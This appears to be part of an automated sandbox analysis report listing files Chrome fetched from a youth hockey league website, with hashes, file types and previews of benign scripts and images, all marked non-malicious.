                                                                                                                          Entropy (8bit):4.8035671313969885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:JSbMqSL1cdXWKQKFcM6Qaxp3T2TjWaee:PLKdXNQKFtaxZT2TjL
                                                                                                                          MD5:C206147C7CAE99642A4F8A2C640A0019
                                                                                                                          SHA1:8C32B7B7E0807BBE85E5C8C94F87AFEA31EEDC40
                                                                                                                          SHA-256:6F55ADBECCE78B9C566F8DC830177DC91782702FF35F213F009FC2B902E25603
                                                                                                                          SHA-512:0D94AA53B801AC69A9BB4A7DF4FC0E00B6FFD1C5668A6FEE4EFC11986B7F516EB27A8A0197C0106A4295ACD5F63C222EA2F1BD9431BF2D689672AC91C5528EB6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF
                                                                                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js');
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2641
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):927
                                                                                                                          Entropy (8bit):7.799969426492565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:X7HHv61JwFiHEhpB9gnaXw75wRI1U1JReBhHrk0fL/MX:XrUyYHE/BKcMwyU1ChLL/I
                                                                                                                          MD5:AA205C5159E1B6C20D6EC93077BCDDC3
                                                                                                                          SHA1:EA32FA5959981F7D6740D9637FB70A06F934EC25
                                                                                                                          SHA-256:995B282408A71EEA22C6685F27FD38C389AF433A2432EB57C9B320A45C89A545
                                                                                                                          SHA-512:DDEFA315E2BB645329831F32DAE205825157B0E99AF2C09371A4D5FCECF90360D8B9BF1C55E761AF1C05EA2850E60EC86B3911DE4A404069A65BD932F434751B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://listgrowth.ctctcdn.com/v1/d4c334dff2d433df7f3cc8564a24fff5.json
                                                                                                                          Preview:...........U]o"7..+^W...........n.R.m...D.c_..3.z<$(...g`....}...0..{|...V....[MGt.\1:;{zzz.M^:.;.u.;|^.iX0}V.]+.Aa.Z...s...L....R.pcU....a.....T. .bJ..A..)[..>X`.,.3.#.re.#l......b.).g.\..eIG/.5.'.........iM>.&.....Q^i}d.v6...)...Ip06.v.oh..2...4..B..~".E._...v..C.]..Y...'{....V.v.JgV7Mmn.V..........B.F.....k@......u..>..N....M*t...._/..\..Z^fT.|Q....hF!....hgF....@.rVG.y..V.p...K....<v...X..R.....3.Q2]....MT.vq..Q.Pv.^.....A..Y0.,... .A...k.....l.VY.*.29..R...xN9]...6.w.pw5!Sx*...X...V-rR...NN..fI........!.1.......s.......5..y..r.3....xw..w$j.........s...v.$M.K.+..=.0.q..\.7*....>Y..o.n.+...K.,.F.`..I.G. `<.A..|...(...\4.".Q..)C.G....q.&...1^9.f9.1..Z*,.*A..:Tc.!W=No.5....\...=.f.C|.7...a.....0.$?...)V.;.v......Je1......I..H5.W8_./]..J.y].y.gm......~9-..W....9.+..C..w_u..$......u.@t......(.Yy..i....,.f....n..q*.`,`...;..)....-.C......bo..l...L..~..r.=l...GT.Q...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 96 x 87, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):9377
                                                                                                                          Entropy (8bit):7.9495057295844855
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:wL/peGJrbyQMjcbR68+Ul0xuNJdcBITYc+Mrhc6i3sIAcmWjGTi:wL/Zrb3mI6xUl0CdcSYlsqHsLZZTi
                                                                                                                          MD5:210DEE15F243F18B645718F311EDD373
                                                                                                                          SHA1:397399DE6EACB7C26F979F14AD04BB9D2ECE8CD2
                                                                                                                          SHA-256:7072AF5E02B3554F35CBC9D8523143998E5D1D9074E12F5B66F77C3207CF9338
                                                                                                                          SHA-512:178969FD7AE350918FF06D4E7272B2EE92EB60D10E15E0FE2BD517562E842F07748C747611994C9B65BC07970052EB2CB1EC538DA0D7483C80FA6719FC4E0B57
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthl.s3.amazonaws.com/assets/images/gthl_logo_thumb-1.png
                                                                                                                          Preview:.PNG........IHDR...`...W.......@-....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.1/26/16..6....tEXtSoftware.Adobe Fireworks CS6.... .IDATx..]w.]E.~..sn.[. ..B0F.R$.B'.......]...... *E..PD.. -D.-"..D.%.@h!......y.......&.Yy..<.{.o...k3.D...#.}o.'z....{]..5.M...l.6...eSH....K..}......&`C1..js...I.l.p...|&....N;.P..;.*.*..W.=..c.....g.....|Emk...E."..*3..f....G.6m}..l.6..n..L67|O....}(..1[..>n...7..l........._of...S.lLA.V..C,.<........Mc_.c...~i......@.P .!.4......_.?26.t...).<....>.fV.X.A....FYC.U .a...f.t.A.Mko.b.z...*....ExF.......h.?...hk9.../.9.........a.....:./{..q......@...E+P..lQ...#...c._vt..>.....e..v...~w..........)^..u"..T(x.x....X.)*R.G.... .kk>.G..}...M..c...Z]wt..........f....<..YS..-.V..J3..'"V(@^.F.8!.J..&.E"..X..:./..x..C..:}..{...#..69.&N.>...;:Fe.[g._.._..w.M....{*....U.....`s....A.V.....U....baEAl.P.......a.F.E.._....=o.+.W..gYk...y.M.Q9^8....V._,6LR).x..dleS.{8;i.9._w....O.z.I.u.]..e3".....%..%.......o.4..}...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1055)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2690
                                                                                                                          Entropy (8bit):5.398083497267717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Otg7xNqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:rN7Qabhiwdicju8WhRHMnTx
                                                                                                                          MD5:2669D16AAE166D157B8434762A199620
                                                                                                                          SHA1:CA7E08D45D0D469ED57825C28CB214F421311F97
                                                                                                                          SHA-256:944A37F694B55DE268A0BF52DBAE4E12F12C4AE09EE5C8D213BA05075C2865DD
                                                                                                                          SHA-512:51CCCC87145F0B0098B81BEA1506C726BB249E65F3B5FCC853F1FC4D4E55716F1F9318E43A2A0B31DFC4C968C14EBAF1EEFB9331C6DCE1B561459883DA7E9432
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(let c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests||(a.google_image_requests=[]);const d=l(a.document);if(e||c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 730x406, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):79992
                                                                                                                          Entropy (8bit):7.958150129532597
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:NLcqiIaaQPTjONuVQvmoltwgElYN5oB9RguRdsj9fMelDy77VCM8DeYOtsnT:N9ajwWQuvjOCXRq5fPlDy1CdDNO+nT
                                                                                                                          MD5:499C6DBAFD87888308901D2C585C3186
                                                                                                                          SHA1:1988974ABB1CB7096ABA04CCF6AEE1A4770564A7
                                                                                                                          SHA-256:61D2DBCA4D1766F10D8DC42916BACA97CB0A11AFC5F6A96187698A0B1E5A7A7B
                                                                                                                          SHA-512:1A7A0A27B23EA8F2DDC3CC5BE389BBC7C3D1267D3C6C8C41DE6126DCE994C4F6731D345027AFA76D9AE1AEE150DDC9E6682865DA1D209DD492967D7B4C9B2C44
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-730x406.jpg
                                                                                                                          Preview:......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........*.&acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt...<...0ndin...l...>mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........E.S.-.2.4.X.3..text....Copyright Apple Inc., 2024..XY
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2503)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):263007
                                                                                                                          Entropy (8bit):5.600042681433955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:KAEF77If2J/KsQomzjXilLJNVLB9g+oksrq8Noy9UOj6x546yo9kgq8Ua/gW7N3I:KR77If2J/KdzjXilLJNVLXxoksrqTz5M
                                                                                                                          MD5:5CEDB8D0F4960B6B2E5D79018CC532DA
                                                                                                                          SHA1:DE78D85C1F4FFC65A3A0D7F0F877B52F1483626D
                                                                                                                          SHA-256:A4F7C13A106649A73BE3139A3965DDDDD747AE5A50020599B32B0FE2D6E06D52
                                                                                                                          SHA-512:A460AE4130F67B562E81A1D0099C8D7C14519565511680CEBF9452FE512921619F848156D3314E3636E3BA2F809CC32E42959DC0145503DE5906E2903041DDD6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h=this||self,ba=function(a,b){a=a.split(".");var c=h;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b},p=function(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=h,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b},q=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"},ca=function(a){var b=q(a);return b==."array"||b=="object"&&typeof a.length=="number"},da=function(a){return a},ea=function(a,b){function c(){}c.prototype=b.prototype;a.Lc=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Ec=function(d,e,f){for(var g=Array(arguments.length-2),k=2;k<arguments.length;k++)g[k-2]=arguments[k];return b.prototype[e].apply(d,g)}};var fa={2784:1,"2032,20008":2,"2032,20009,20320001":3,"2032,20009":
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 730x427, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):47127
                                                                                                                          Entropy (8bit):7.967978995780205
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:HHcC1Chv5KWNe3Rv1D+HIhao7prFccytyPaRK84dKf3mngyNFu6M8q3/jRsqdB7J:dChv5KWNe3RtiHIhao7pbygcSEmNXzMH
                                                                                                                          MD5:A94F77CCB534BAA196549EC446C6B548
                                                                                                                          SHA1:23DA2A217CEB8BDFAB5CA6B6B435F0B78961EA02
                                                                                                                          SHA-256:B33ACDB7EC08E54DD59512DD736E00AA0099B8A3A0487764CD017AF77A2F338C
                                                                                                                          SHA-512:8AFA085FEEC3234960B28216EF368EBF045B65F1AC08DA6E35168C80CF6C36255A8668BC14E5CBCE6D7E88B1F8E544AF04920EA9D6E17D3E0B4C618689A1580E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e1734632610661-730x427.jpg
                                                                                                                          Preview:......JFIF.............XExif..MM.*.......;.........&...........6....Glenn Steplock..2023.gsteplock@gmail.com......ICC_PROFILE.......lcms....mntrRGB XYZ ............acspMSFT....sawsctrl.......................-hand...=@..=@t,...".................................desc........cprt........wtpt........rXYZ...,....gXYZ...@....bXYZ...T....rTRC...h...`gTRC...h...`bTRC...h...`desc........uRGB............text....CC0.XYZ .......T........XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv.......*...|.....u.....N.....b.......j.. C$.)j.~3.9.?.FWM6Tv\.d.l.uV~..,.6..........e.w.......TPhotoshop 3.0.8BIM.......8..Z...%G..P..Glenn Steplock..t..2023.gsteplock@gmail.com...C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$...........".........................................L..........................!1..AQa."2q...B..#R..3Cbr..S....$4c..%5DE.&s...................................9.......................!..1A..Q
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (654)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):560258
                                                                                                                          Entropy (8bit):5.668859512958225
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:QStgGd8JmYx0sb6h8YfALjbBksK8ecdy7FdzZA96fcJ2fL2iJ5B7lXaqy2:Gn8hALjbispecknzXfIKhX7
                                                                                                                          MD5:19DDAC3BE88EDA2C8263C5D52FA7F6BD
                                                                                                                          SHA1:C81720778F57C56244C72CE6EF402BB4DE5F9619
                                                                                                                          SHA-256:B261530F05E272E18B5B5C86D860C4979C82B5B6C538E1643B3C94FC9BA76DD6
                                                                                                                          SHA-512:393015B8C7F14D5D4BDB9CCEED7CD1477A7DB07BC7C40BAE7D0A48A2ADFA7D56F9D1C3E4EC05C92FDE152E72FFA6B75D8BF724E1F63F9BC21421125667AFB05C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var X=function(){return[function(N,a,U,y,A,l,z){if((l=["toString",6,"constructor"],N&71)==N)if(typeof U==="string")z={buffer:Z[11](17,1,a,U),qH:!1};else if(Array.isArray(U))z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===Uint8Array)z={buffer:U,qH:!1};else if(U[l[2]]===ArrayBuffer)z={buffer:new Uint8Array(U),qH:!1};else if(U[l[2]]===WC)z={buffer:r[9](25,a,null,U)||new Uint8Array(0),qH:!0};else if(U instanceof Uint8Array)z={buffer:new Uint8Array(U.buffer,U.byteOffset,U.byteLength),qH:!1};else throw Error("Type not convertible to a Uint8Array, expected a Uint8Array, an ArrayBuffer, a base64 encoded string, a Byt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x250, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):87962
                                                                                                                          Entropy (8bit):7.979425214924049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:7y3AwbQAZouWlozt/k6gsEymMXG3hH34iO20+H6+3Ie5296N3:7y37QpuWyzC6gVyHWRIiO5E4cC6N3
                                                                                                                          MD5:4ACB2561715FB939FA4403A1FE259898
                                                                                                                          SHA1:5450936329559A5FD50FA9D5208B7FB81C7E6ED9
                                                                                                                          SHA-256:84B564D332E4499B17617AC5F84E0AC17F3FAE81330B4E4E9FCF741938176B97
                                                                                                                          SHA-512:BFF7E8F86BD5E2C6A3AB1465875676A569195360DFBF9056893B55F548B94299B171C3536F17AC34EB1E125A8339D5881521E954A4BA9C79C8D4814ADC7DB6C7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg
                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:32975521-f407-1243-8ae0-fd2f2621d81f" xmpMM:DocumentID="xmp.did:7871371BAE3611EE9644800C10B6CFC9" xmpMM:InstanceID="xmp.iid:7871371AAE3611EE9644800C10B6CFC9" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2eae8c94-550d-aa4e-9a26-16186ee9c778" stRef:documentID="adobe:docid:photoshop:70678080-e259-a349-b385-b99feb356496"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):817
                                                                                                                          Entropy (8bit):7.598861335957131
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6ydI0A7cO+e+FQiyaCmyZbYcrK9iSjBaYUMjAdT:S/65zcO24my9NWBadMuT
                                                                                                                          MD5:11C4233C46670A65187B0D2A340A2352
                                                                                                                          SHA1:E94B734A99725468C47F392861E3A07A1CDBD878
                                                                                                                          SHA-256:5BD684A218D48335A4907DDE8C27CB895EE567CD8FD8D3EF1480CF9C5192F3A0
                                                                                                                          SHA-512:560D9399896E3CE7F59B5701407F9AFA1AA61C34FDB9E4CBF04E509ADF6D3E8B20CCDB3771484E9EA4FB28FC0A77CB06C17569FA17D7326E5DE7A307E0A8A99C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs.................IDATx...KTq.....X..(.z,jST....(J....MA..p...k~.e.b&..G....Y-..Pz.a.Lj....42...6..s...........s~.33J...(..EH.G..B*.Vxb!.!...pn.ku...#L.\v>...Y..L.....-...j^..p.......0>.#oa.......P..U......o/..$T....qMG..-..m...j.^WB....h..9P.....i.<9..Zaj.GI.4...@;...~...:..].m./.t.......Mpe.....K...1..M...0m..9@.....s&Js....e0.....K..d$v...>..{.,7u.R2&.."..L.....T.J..{9..C..,..5....c.........'...*..S@....LC.....l1.....s...f..^g....xw=K.....G`.!.......(T...@.V.......0....u"..3..!.]....q.Vv/......z/.}.. ...+.]..AM...0.>...d...,.:_v...-.\.....v_2.4vd......]l....5..( .L.}{....s. ..q.`..@>OuL~.2..n....y.d....l..Hc;.G...r....=p{...N..6.g^^d.....B.......7..7...2..;..{..>@..y|b..d....3c!.7m.?Y(.A.3.>..@R.._Lz..|.@..)...O.v........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (5657)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):6162
                                                                                                                          Entropy (8bit):5.599076700545423
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Sb04pPhtmpvftu/PvJ/CMMKJ8UotoqzpfLEj:s0i5fPJ6FEPkIj
                                                                                                                          MD5:6AAAF8E11A32FD37FB419E3A4CE9696C
                                                                                                                          SHA1:1FD88F2EE4DE5422E0C344DEBEFE3F2B5ABB2592
                                                                                                                          SHA-256:468959E93F9B4E6F07C6A8F8D0E93D8FCB37D76A8615A93EC153F5842247BA99
                                                                                                                          SHA-512:748B27BDB7C7FA082D7BE6C69F56DC33302105784391320A5CF960531C594097BC406FD3F4690E4CF74F4016F4D56804A4296E9BD885562EB66699E1318F7000
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://8d17553e21b5bbe3db18b8f4b7e37c15.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html
                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8">. <title>SafeFrame Container</title>. <script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f=this||self,h=function(a){return a};var n=function(a,b){this.h=a===l&&b||"";this.g=m},p=function(a){return a instanceof n&&a.constructor===n&&a.g===m?a.h:"type_error:Const"},m={},l={};var r=void 0;/*.. SPDX-License-Identifier: Apache-2.0.*/.var t,aa=function(){if(void 0===t){var a=null,b=f.trustedTypes;if(b&&b.createPolicy){try{a=b.createPolicy("goog#html",{createHTML:h,createScript:h,createScriptURL:h})}catch(c){f.console&&f.console.error(c.message)}t=a}else t=a}return t};var ca=function(a){this.g=ba===ba?a:""};ca.prototype.toString=function(){return this.g+""};var ba={},da=function(a){var b=aa();a=b?b.createScriptURL(a):a;return new ca(a)};var ea={},u=function(a,b){this.g=b===ea?a:""};u.prototype.toString=function(){return this.g.toString()};var ha=function(){var a=v,b={messa
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (24489)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):170649
                                                                                                                          Entropy (8bit):6.264588167926433
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:bDymDKhDgICDNt1oFCM4lyGGWgHh6F99nxV6mL2xkHR:bjKhDgIANt3lGWgyxj2xkx
                                                                                                                          MD5:CF6D65FE3E48CB35829102F380404E20
                                                                                                                          SHA1:E78302BAF621AF7730AA14378D8355BC70F2CBCD
                                                                                                                          SHA-256:69D1108B4F184C220F5C3C7780BAF395E43679FDC595492C974990627D48FE59
                                                                                                                          SHA-512:DAA24E7D7253674985CC5020AB818713DF3BB955BD8EBF77D65442B3E4068C1B8D6EBCD9EE7919419516E1EB0234ADAC0D1737F64D390AE763CE3D917D8D9FCA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/bower_components/moment/min/moment-with-locales.min.js
                                                                                                                          Preview:!function(a,b){"object"==typeof exports&&"undefined"!=typeof module?module.exports=b():"function"==typeof define&&define.amd?define(b):a.moment=b()}(this,function(){"use strict";function a(){return Md.apply(null,arguments)}function b(a){Md=a}function c(a){return"[object Array]"===Object.prototype.toString.call(a)}function d(a){return a instanceof Date||"[object Date]"===Object.prototype.toString.call(a)}function e(a,b){var c,d=[];for(c=0;c<a.length;++c)d.push(b(a[c],c));return d}function f(a,b){return Object.prototype.hasOwnProperty.call(a,b)}function g(a,b){for(var c in b)f(b,c)&&(a[c]=b[c]);return f(b,"toString")&&(a.toString=b.toString),f(b,"valueOf")&&(a.valueOf=b.valueOf),a}function h(a,b,c,d){return Ca(a,b,c,d,!0).utc()}function i(){return{empty:!1,unusedTokens:[],unusedInput:[],overflow:-2,charsLeftOver:0,nullInput:!1,invalidMonth:null,invalidFormat:!1,userInvalidated:!1,iso:!1}}function j(a){return null==a._pf&&(a._pf=i()),a._pf}function k(a){if(null==a._isValid){var b=j(a);a._
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 730x427, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):47127
                                                                                                                          Entropy (8bit):7.967978995780205
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:HHcC1Chv5KWNe3Rv1D+HIhao7prFccytyPaRK84dKf3mngyNFu6M8q3/jRsqdB7J:dChv5KWNe3RtiHIhao7pbygcSEmNXzMH
                                                                                                                          MD5:A94F77CCB534BAA196549EC446C6B548
                                                                                                                          SHA1:23DA2A217CEB8BDFAB5CA6B6B435F0B78961EA02
                                                                                                                          SHA-256:B33ACDB7EC08E54DD59512DD736E00AA0099B8A3A0487764CD017AF77A2F338C
                                                                                                                          SHA-512:8AFA085FEEC3234960B28216EF368EBF045B65F1AC08DA6E35168C80CF6C36255A8668BC14E5CBCE6D7E88B1F8E544AF04920EA9D6E17D3E0B4C618689A1580E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............XExif..MM.*.......;.........&...........6....Glenn Steplock..2023.gsteplock@gmail.com......ICC_PROFILE.......lcms....mntrRGB XYZ ............acspMSFT....sawsctrl.......................-hand...=@..=@t,...".................................desc........cprt........wtpt........rXYZ...,....gXYZ...@....bXYZ...T....rTRC...h...`gTRC...h...`bTRC...h...`desc........uRGB............text....CC0.XYZ .......T........XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv.......*...|.....u.....N.....b.......j.. C$.)j.~3.9.?.FWM6Tv\.d.l.uV~..,.6..........e.w.......TPhotoshop 3.0.8BIM.......8..Z...%G..P..Glenn Steplock..t..2023.gsteplock@gmail.com...C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$...........".........................................L..........................!1..AQa."2q...B..#R..3Cbr..S....$4c..%5DE.&s...................................9.......................!..1A..Q
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1024x200, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):64482
                                                                                                                          Entropy (8bit):7.950790943186919
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DBPWgdpl1SCIZSBHYG8JJHuLM8Fh1zLvDXnkJbaJ3NMP:tpSCI0d8JJHurznnrJ3a
                                                                                                                          MD5:02B9B75E50891266ABDBB5C111155A82
                                                                                                                          SHA1:E25344AD78E28BEC4650C4B369294BE4C2038B8A
                                                                                                                          SHA-256:8BD57B7E56D3EA41E1970F3B51CB918B4D9831381C37446C1CF89E5165CBB422
                                                                                                                          SHA-512:DEBEEAD9D07F879AF38E9411DD4319EB5B8AF550C1FF79BC5F1FB4A1952D8CB8E9F6A2C063423A67C0642AB15359F963AA3300B086C372523A6A3414D576E9B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg
                                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="xmp.did:3040A176ED2068118083B7D82882DAD4" xmpMM:DocumentID="xmp.did:47EDFB11811E11E7B725C6949D8C794F" xmpMM:InstanceID="xmp.iid:47EDFB10811E11E7B725C6949D8C794F" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B81299D8CF2068118C149F284D654366" stRef:documentID="xmp.did:3040A176ED2068118083B7D82882DAD4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket e
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
